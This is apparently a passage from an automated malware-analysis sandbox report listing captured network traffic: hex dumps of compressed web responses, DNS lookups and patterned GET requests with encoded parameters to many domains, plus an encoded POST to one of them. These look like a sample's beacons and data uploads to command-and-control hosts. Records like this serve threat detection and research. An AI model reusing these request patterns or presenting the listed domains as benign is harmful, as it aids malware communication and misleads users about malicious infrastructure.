58 d7 ab 20 c5 86 54 ed 57 36 b6 fa 1b 5b 95 64 6a 3a 51 14 aa dd 5a ad 1d b3 2a 71 23 d6 a3 cd f5 aa 3b ac b1 a0 5d d3 ad 6a a4 b9 8e 2d a9 84 1f 36 ed ab 21 6f 57 e6 e5 b8 59 ef 6f d6 6f c0 d1 b4 5f 88 e3 56 b3 bf d5 bc 01 47 d3 7e 31 8e 9b fd ad cd 9b 70 d4 ed 17 e2 d8 68 ac f7 e1 73 03 9e 09 85 c5 b8 36 eb 7d f8 dc 84 ab a5 b0 18 d7 75 90 74 fd 46 7d b5 14 16 e3 ba d1 ec c3 e7 26 5c 2d 85 c5 b8 6e c3 f8 6c df 68 84 2d 85 32 ae 96 53 34 08 01 6e 58 40 da b4 a6 2b 8d 59 ef 80 b8 3b 8b 75 78 cc d4 b6 5d 9c e9 5a b3 bf 76 3d 96 a6 e5 e2 0c 77 36 fb 3b 8b 99 6a ca d0 b4 bc c6 b0 6e f6 1b d7 63 68 5a 4e 18 66 7c 45 a0 f4 9c 33 97 68 c7 84 5f 33 9f 3e 16 7e ce df dc 6b 99 7f 73 b4 7c aa 25 ce b4 9c 4b c4 40 e1 72 c3 ca b0 8a 3a 34 a0 d8 bd 4c b0 c9 18 aa 68 e0 53 d5 a1 34 ba 6a a8 7c e6 48 22 07 35 43 be d6 09 1b 9b 35 d3 b8 ea 2a 35 3f d5 09 45 11 d4 a0 a5 0b dd 6a d4 02 c2 78 15 5a a8 2f 7a fb 5b de 36 5d 6b d6 b7 d6 b7 5a 9b 5b f5 8d 0d b7 41 1a f5 fa 76 cb 71 d7 eb 5e dd 6d 5c c6 cb ea 42 44 fb 91 a6 9d f2 ae 01 fd be eb f1 aa 23 44 a4 22 49 42 7d a3 05 68 c1 e8 60 72 42 95 80 2e ad 57 d7 aa 75 dd 2e 57 5c 0d 40 34 4d 0c b8 2e 05 d4 63 04 50 c4 f7 8d 14 08 2d 24 c7 ac 91 d5 2c 7d c2 3d c6 db e9 60 ea 2e 1a 82 9a cd d2 9f 58 a0 e3 2e 14 4b ff 41 4a 44 cb a8 aa 6d 21 da 3e 25 21 53 e9 80 7e d1 22 01 f3 07 fb af 21 08 f3 7d 16 07 ff f4 1d 75 76 d7 eb f5 d5 2d f8 ec c0 67 13 3e 6b f5 fa e7 2a 76 74 4c e8 83 4a f2 55 f3 8d 41 e0 95 87 86 fb d2 9f cc 20 b4 88 4b d1 0f fa 7e 29 b9 d7 c4 77 d1 72 2a bf 51 47 b5 fc d0 54 51 d2 dd 35 42 2e cf ea aa 26 52 cb b7 ad 52 11 2d af a0 96 90 01 89 1e 2c d3 c0 a1 9e 47 3d 2c 42 d0 5b 18 c7 e5 95 55 43 7c 69 61 c2 51 d4 ca 10 8e 64 4c 6f 46 ef 44 b4 b2 04 ed ed 75 89 a9 5e 3b 43 cb dc 3d 9c 8c f3 09 65 ed 4e b4 8b b8 7e ee 67 1e 18 a5 c8 95 bf b5 f3 a5 93 01 23 8b 23 bc 41 d9 94 55 c6 1a 81 40 23 2a 96 a6 e8 51 d9 f2 c5 09 ee ef a2 0e 83 71 e7 59
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 14:18:24 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4981Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5c cd 73 1b b7 92 3f 2b 55 f9 1f 10 ba 1c 59 b5 02 bf f4 2d 4b ca 73 6c e5 3d af e3 8f 8d bc 49 6d 2e 2e cc 0c 48 42 9c 01 e6 01 33 14 c9 3c df 77 ab d6 f7 cd fa b2 3a fa a0 ca 61 6f af ea e5 42 e9 ff da 06 30 43 ce 0c 87 12 a9 8f ac f3 e1 84 d4 0c 06 e8 6e 00 dd bf ee 06 c0 d9 eb 44 81 7f f0 e9 27 9f 7e b2 d7 a1 c4 83 ab a5 3d 87 28 8a 3a 92 b6 f6 2b b5 8a 29 09 68 44 90 db 21 52 d1 68 bf 12 47 2d bc 5d 31 8d 96 f6 22 16 f9 f4 e0 d1 e3 d7 4f bf 3d 44 cd f5 55 a4 aa b2 2a aa 7b 35 fb c0 56 32 ed 39 09 e8 7e a5 c7 e8 49 28 64 54 41 ae e0 11 e5 40 ef 84 79 51 67 df a3 3d e6 52 6c 6e 56 11 e3 2c 62 c4 c7 ca 25 3e dd 6f 64 c4 b0 64 9e d1 c1 89 90 9e ca 90 99 aa f3 84 2a 57 b2 30 62 82 67 aa 4d 89 3a d5 ee 51 1c 75 84 5c a8 c9 cb 13 4e 2f 6d 81 d2 f1 fa 0c 63 d4 22 d0 55 c1 91 8a 88 8c 10 c6 86 9a cf 78 17 49 ea ef 57 48 18 fa 14 47 22 76 3b 58 d7 ab 20 c5 86 54 ed 57 36 b6 fa 1b 5b 95 64 6a 3a 51 14 aa dd 5a ad 1d b3 2a 71 23 d6 a3 cd f5 aa 3b ac b1 a0 5d d3 ad 6a a4 b9 8e 2d a9 84 1f 36 ed ab 21 6f 57 e6 e5 b8 59 ef 6f d6 6f c0 d1 b4 5f 88 e3 56 b3 bf d5 bc 01 47 d3 7e 31 8e 9b fd ad cd 9b 70 d4 ed 17 e2 d8 68 ac f7 e1 73 03 9e 09 85 c5 b8 36 eb 7d f8 dc 84 ab a5 b0 18 d7 75 90 74 fd 46 7d b5 14 16 e3 ba d1 ec c3 e7 26 5c 2d 85 c5 b8 6e c3 f8 6c df 68 84 2d 85 32 ae 96 53 34 08 01 6e 58 40 da b4 a6 2b 8d 59 ef 80 b8 3b 8b 75 78 cc d4 b6 5d 9c e9 5a b3 bf 76 3d 96 a6 e5 e2 0c 77 36 fb 3b 8b 99 6a ca d0 b4 bc c6 b0 6e f6 1b d7 63 68 5a 4e 18 66 7c 45 a0 f4 9c 33 97 68 c7 84 5f 33 9f 3e 16 7e ce df dc 6b 99 7f 73 b4 7c aa 25 ce b4 9c 4b c4 40 e1 72 c3 ca b0 8a 3a 34 a0 d8 bd 4c b0 c9 18 aa 68 e0 53 d5 a1 34 ba 6a a8 7c e6 48 22 07 35 43 be d6 09 1b 9b 35 d3 b8 ea 2a 35 3f d5 09 45 11 d4 a0 a5 0b dd 6a d4 02 c2 78 15 5a a8 2f 7a fb 5b de 36 5d 6b d6 b7 d6 b7 5a 9b 5b f5 8d 0d b7 41 1a f5 fa 76 cb 71 d7 eb 5e dd 6d 5c c6 cb ea 42 44 fb 91 a6 9d f2 ae 01 fd be eb f1 aa 23 44 a4 22 49 42 7d a3 05 68 c1 e8 60 72 42 95 80 2e ad 57 d7 aa 75 dd 2e 57 5c 0d 40 34 4d 0c b8 2e 05 d4 63 04 50 c4 f7 8d 14 08 2d 24 c7 ac 91 d5 2c 7d c2 3d c6 db e9 60 ea 2e 1a 82 9a cd d2 9f 58 a0 e3 2e 14 4b ff 41 4a 44 cb a8 aa 6d 21 da 3e 25 21 53 e9 80 7e d1 22 01 f3 07 fb af 21 08 f3 7d 16 07 ff f4 1d 75 76 d7 eb f5 d5 2d f8 ec c0 67 13 3e 6b f5 fa e7 2a 76 74 4c e8 83 4a f2 55 f3 8d 41 e0 95 87 86 fb d2 9f cc 20 b4 88 4b d1 0f fa 7e 29 b9 d7 c4 77 d1 72 2a bf 51 47 b5 fc d0 54 51 d2 dd 35 42 2e cf ea aa 26 52 cb b7 ad 52 11 2d af a0 96 90 01 89 1e 2c d3 c0 a1 9e 47 3d 2c 42 d0 5b 18 c7 e5 95 55 43 7c 69 61 c2 51 d4 ca 10 8e 64 4c 6f 46 ef 44 b4 b2 04 ed ed 75 89 a9 5e 3b 43 cb dc 3d 9c 8c f3 09 65 ed 4e b4 8b b8 7e ee 67 1e 18 a5 c8 95 bf b5 f3 a5 93 01 23 8b 23 bc 41 d9 94 55 c6 1a 81 40 23 2a 96 a6 e8 51 d9 f2 c5 09 ee ef a2 0e 83 71 e7 59
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 14:18:26 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4981Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5c cd 73 1b b7 92 3f 2b 55 f9 1f 10 ba 1c 59 b5 02 bf f4 2d 4b ca 73 6c e5 3d af e3 8f 8d bc 49 6d 2e 2e cc 0c 48 42 9c 01 e6 01 33 14 c9 3c df 77 ab d6 f7 cd fa b2 3a fa a0 ca 61 6f af ea e5 42 e9 ff da 06 30 43 ce 0c 87 12 a9 8f ac f3 e1 84 d4 0c 06 e8 6e 00 dd bf ee 06 c0 d9 eb 44 81 7f f0 e9 27 9f 7e b2 d7 a1 c4 83 ab a5 3d 87 28 8a 3a 92 b6 f6 2b b5 8a 29 09 68 44 90 db 21 52 d1 68 bf 12 47 2d bc 5d 31 8d 96 f6 22 16 f9 f4 e0 d1 e3 d7 4f bf 3d 44 cd f5 55 a4 aa b2 2a aa 7b 35 fb c0 56 32 ed 39 09 e8 7e a5 c7 e8 49 28 64 54 41 ae e0 11 e5 40 ef 84 79 51 67 df a3 3d e6 52 6c 6e 56 11 e3 2c 62 c4 c7 ca 25 3e dd 6f 64 c4 b0 64 9e d1 c1 89 90 9e ca 90 99 aa f3 84 2a 57 b2 30 62 82 67 aa 4d 89 3a d5 ee 51 1c 75 84 5c a8 c9 cb 13 4e 2f 6d 81 d2 f1 fa 0c 63 d4 22 d0 55 c1 91 8a 88 8c 10 c6 86 9a cf 78 17 49 ea ef 57 48 18 fa 14 47 22 76 3b 58 d7 ab 20 c5 86 54 ed 57 36 b6 fa 1b 5b 95 64 6a 3a 51 14 aa dd 5a ad 1d b3 2a 71 23 d6 a3 cd f5 aa 3b ac b1 a0 5d d3 ad 6a a4 b9 8e 2d a9 84 1f 36 ed ab 21 6f 57 e6 e5 b8 59 ef 6f d6 6f c0 d1 b4 5f 88 e3 56 b3 bf d5 bc 01 47 d3 7e 31 8e 9b fd ad cd 9b 70 d4 ed 17 e2 d8 68 ac f7 e1 73 03 9e 09 85 c5 b8 36 eb 7d f8 dc 84 ab a5 b0 18 d7 75 90 74 fd 46 7d b5 14 16 e3 ba d1 ec c3 e7 26 5c 2d 85 c5 b8 6e c3 f8 6c df 68 84 2d 85 32 ae 96 53 34 08 01 6e 58 40 da b4 a6 2b 8d 59 ef 80 b8 3b 8b 75 78 cc d4 b6 5d 9c e9 5a b3 bf 76 3d 96 a6 e5 e2 0c 77 36 fb 3b 8b 99 6a ca d0 b4 bc c6 b0 6e f6 1b d7 63 68 5a 4e 18 66 7c 45 a0 f4 9c 33 97 68 c7 84 5f 33 9f 3e 16 7e ce df dc 6b 99 7f 73 b4 7c aa 25 ce b4 9c 4b c4 40 e1 72 c3 ca b0 8a 3a 34 a0 d8 bd 4c b0 c9 18 aa 68 e0 53 d5 a1 34 ba 6a a8 7c e6 48 22 07 35 43 be d6 09 1b 9b 35 d3 b8 ea 2a 35 3f d5 09 45 11 d4 a0 a5 0b dd 6a d4 02 c2 78 15 5a a8 2f 7a fb 5b de 36 5d 6b d6 b7 d6 b7 5a 9b 5b f5 8d 0d b7 41 1a f5 fa 76 cb 71 d7 eb 5e dd 6d 5c c6 cb ea 42 44 fb 91 a6 9d f2 ae 01 fd be eb f1 aa 23 44 a4 22 49 42 7d a3 05 68 c1 e8 60 72 42 95 80 2e ad 57 d7 aa 75 dd 2e 57 5c 0d 40 34 4d 0c b8 2e 05 d4 63 04 50 c4 f7 8d 14 08 2d 24 c7 ac 91 d5 2c 7d c2 3d c6 db e9 60 ea 2e 1a 82 9a cd d2 9f 58 a0 e3 2e 14 4b ff 41 4a 44 cb a8 aa 6d 21 da 3e 25 21 53 e9 80 7e d1 22 01 f3 07 fb af 21 08 f3 7d 16 07 ff f4 1d 75 76 d7 eb f5 d5 2d f8 ec c0 67 13 3e 6b f5 fa e7 2a 76 74 4c e8 83 4a f2 55 f3 8d 41 e0 95 87 86 fb d2 9f cc 20 b4 88 4b d1 0f fa 7e 29 b9 d7 c4 77 d1 72 2a bf 51 47 b5 fc d0 54 51 d2 dd 35 42 2e cf ea aa 26 52 cb b7 ad 52 11 2d af a0 96 90 01 89 1e 2c d3 c0 a1 9e 47 3d 2c 42 d0 5b 18 c7 e5 95 55 43 7c 69 61 c2 51 d4 ca 10 8e 64 4c 6f 46 ef 44 b4 b2 04 ed ed 75 89 a9 5e 3b 43 cb dc 3d 9c 8c f3 09 65 ed 4e b4 8b b8 7e ee 67 1e 18 a5 c8 95 bf b5 f3 a5 93 01 23 8b 23 bc 41 d9 94 55 c6 1a 81 40 23 2a 96 a6 e8 51 d9 f2 c5 09 ee ef a2 0e 83 71 e7 59
            Source: global trafficHTTP traffic detected: GET /ndq7/?3hkl=slNhbLXpBjO8vl&4dV43tA=OxZKnWuwsJOrHHhSr0WAKMos2ZEDKwJVMtvq3iaqcpp4OrE8YxBQJzvCfYPSu8gmodsQI/gccX7lRSYJm35OlpLbr+Emqb863it5vTM6q/0fJzxBvxXG8nRUn7++wRvQdA== HTTP/1.1Host: www.tcqlk.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /hpa2/?4dV43tA=9ukV0lom1Pkt5UJj/K4lBand6ck4dRKkyq6RFoVD1IbXcSjkOX57QIVSlkgD3OdjwHZgiaAyrGOMfaVTdV8W+y7+gTzt+hDR2BCzfmmCLLxuXIcFaZwChPWJYJEFenE0lA==&3hkl=slNhbLXpBjO8vl HTTP/1.1Host: www.rlplatro.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /pyns/?3hkl=slNhbLXpBjO8vl&4dV43tA=K1EGEj+kimjFg9LR9EnSE5iA5qZu36FTtfUVuSlzoP8oPxhtdzERerS5Mp6fVz5Cq8+DdWETSgOpnIOU0gSGOk+1pkQ/H5TXrv7e3gEZftLrUi5jR50/YQGYV+ODUfVL1g== HTTP/1.1Host: www.xsemckm.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /vjxp/?4dV43tA=XkwDhAosLmY8qOGkJKM7nBqGXPMJWqSVPKG+tEu7tnkRRA5qaKsxdm3QH0407PDb0a9c/bEAso+GP5FSns/F0pcfHDqX+WZ2QlqXVXtujZTwrVOl6ODb0zZvjrqBrFnJXw==&3hkl=slNhbLXpBjO8vl HTTP/1.1Host: www.b6fbly7u.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gb2c/?3hkl=slNhbLXpBjO8vl&4dV43tA=89eEKNhTAfJ0K+ZNbo8QYk1fUSoEpApn1wnFOcVuW0oI5H3wAhPaJlWMgeBIfmA5pU1pUK0VAPZu7D3VTgjehpZPLbfme/O2eAoCBbtXgeZInoaphOuGkqvoaLKQybRjQA== HTTP/1.1Host: www.quantumvoil.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /edi4/?4dV43tA=NUWN0h33C1Yyooj/Nqm5TKnDvFAfPsTlu/xXoo6GTaC/958/rmN21lJSbp33wZ0UtxsuR42FNjevCBZMMsNJEJT8RotDqfV3dG69h6TKJk4r6FZf3JTIotB8t00dC+KIgA==&3hkl=slNhbLXpBjO8vl HTTP/1.1Host: www.transelva.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8urb/?3hkl=slNhbLXpBjO8vl&4dV43tA=+Wbbbk7eLFmMNhAmT0HXUc8arE4mAIhp5z7AS+/8DqhgdhWyAH0zoQfcqO3QhsAMO97HQEWUjr1A2ySQn1zg0/55KGrPENVTP1yAkCUjuBmNS/fntZ3fyi496lnRN2tFRA== HTTP/1.1Host: www.gsdaluan.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /k4dg/?4dV43tA=nz4FHKR3kHD8T7sos5tKkVQRfY182oQFmZOBlJ8PbPlp6eprRQ8g6Bnz+oNd18dyAKSZqsJ9UtPL5lP5nYFy9dCb86j6n0RTbdEdkH9XwmQfMRZVI+dcEtE4XSVBGLRbLA==&3hkl=slNhbLXpBjO8vl HTTP/1.1Host: www.mommysdaycare.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /dy54/?3hkl=slNhbLXpBjO8vl&4dV43tA=nRvBPTzlzGF4n3rt1QttF4nrN+JQ8KTHZyrUcXxxKI8o38P7J7J9FRPNIVc1TZhiGrLUOXxy1Ju1j9DdTlskr3z+VILb9gUTk9d2pc0Ee/hjvnETVBSGl3uD2JlRjMFEvQ== HTTP/1.1Host: www.203av.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /vi6c/?4dV43tA=bcf+LDcyoYCm+QyU3/UN8JBlUcMDsPN1iNWsx7umrkQm3W+qfOHyOayxGzxcStXTe9ogwFYflhpGlkCNjFINeirDlZuuOL3Enw+3v27XAzPfiFhmkrPFAnkPRuNZJaNv/Q==&3hkl=slNhbLXpBjO8vl HTTP/1.1Host: www.hydrogenmovie.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /n983/?3hkl=slNhbLXpBjO8vl&4dV43tA=e+5nfbuNDjer0F2gZArKywdTCxWjyYobv/bJcL0KsTg4lVUyb9D57z7xFmyHzStdVmhrGKgxJydatVMh3gIVfbA1nNcelGxUr0Cqn1CeETaIIhfK6rSIprtv6DqA0Tv84A== HTTP/1.1Host: www.atmpla.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2pcd/?4dV43tA=tIH23YAAyU0vk1VwVlLsnDkrzub9KGyrHgMKKMQURaOCIZhbg0Upzh73XSapbsD05fysGFvFeXdkAWPx22YjftjyG2q/7RKdCSWXn7wn/qpIWY7LWJ3oR8OZl3TaORuYDQ==&3hkl=slNhbLXpBjO8vl HTTP/1.1Host: www.europedriveguide.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /irbt/?3hkl=slNhbLXpBjO8vl&4dV43tA=mqJtasd7r+ucb4h/g/ZTmy6JwNbO/v5n7k97Wehkk725AqfiRwLRxT17AJTqC5rNKbn4S3nwUKyYsCTiBBHbxywoRNMYnVscP0z+oucLCcHVoXQNraVEZ5jUDUaptob6FA== HTTP/1.1Host: www.coinmao.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.tcqlk.com
            Source: global trafficDNS traffic detected: DNS query: www.rlplatro.sbs
            Source: global trafficDNS traffic detected: DNS query: www.xsemckm.sbs
            Source: global trafficDNS traffic detected: DNS query: www.b6fbly7u.shop
            Source: global trafficDNS traffic detected: DNS query: www.quantumvoil.xyz
            Source: global trafficDNS traffic detected: DNS query: www.transelva.com
            Source: global trafficDNS traffic detected: DNS query: www.gsdaluan.shop
            Source: global trafficDNS traffic detected: DNS query: www.mommysdaycare.net
            Source: global trafficDNS traffic detected: DNS query: www.203av.com
            Source: global trafficDNS traffic detected: DNS query: www.hydrogenmovie.com
            Source: global trafficDNS traffic detected: DNS query: www.atmpla.net
            Source: global trafficDNS traffic detected: DNS query: www.europedriveguide.com
            Source: global trafficDNS traffic detected: DNS query: www.coinmao.com
            Source: global trafficDNS traffic detected: DNS query: www.genesiestudios.online
            Source: unknownHTTP traffic detected: POST /hpa2/ HTTP/1.1Host: www.rlplatro.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.rlplatro.sbsCache-Control: no-cacheConnection: closeContent-Length: 208Content-Type: application/x-www-form-urlencodedReferer: http://www.rlplatro.sbs/hpa2/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 34 64 56 34 33 74 41 3d 77 73 4d 31 33 52 46 68 70 75 4e 42 35 31 78 55 70 59 59 75 42 34 72 48 6f 39 30 48 53 32 69 71 31 61 6d 4d 63 65 4d 4b 7a 34 76 37 65 68 53 57 51 45 51 74 55 36 74 41 76 51 51 78 31 73 35 36 2b 45 42 70 73 49 4d 67 7a 56 47 4b 62 5a 63 4b 47 55 59 45 33 46 44 43 39 69 2f 71 36 53 44 47 71 43 6d 38 4a 56 2b 6b 4d 37 64 64 49 5a 59 42 64 72 45 32 6d 74 50 4d 65 62 39 42 56 6b 45 2b 32 4b 6d 79 75 54 35 4b 34 55 74 39 36 79 61 49 58 32 65 54 36 30 2b 61 32 50 69 71 76 33 6c 42 48 6f 67 76 49 54 48 2f 47 74 51 73 45 78 4e 4c 44 43 7a 7a 73 43 61 31 30 2b 50 61 7a 57 42 79 4e 70 63 49 41 2f 73 3d Data Ascii: 4dV43tA=wsM13RFhpuNB51xUpYYuB4rHo90HS2iq1amMceMKz4v7ehSWQEQtU6tAvQQx1s56+EBpsIMgzVGKbZcKGUYE3FDC9i/q6SDGqCm8JV+kM7ddIZYBdrE2mtPMeb9BVkE+2KmyuT5K4Ut96yaIX2eT60+a2Piqv3lBHogvITH/GtQsExNLDCzzsCa10+PazWByNpcIA/s=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Jul 2024 14:16:06 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Jul 2024 14:16:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
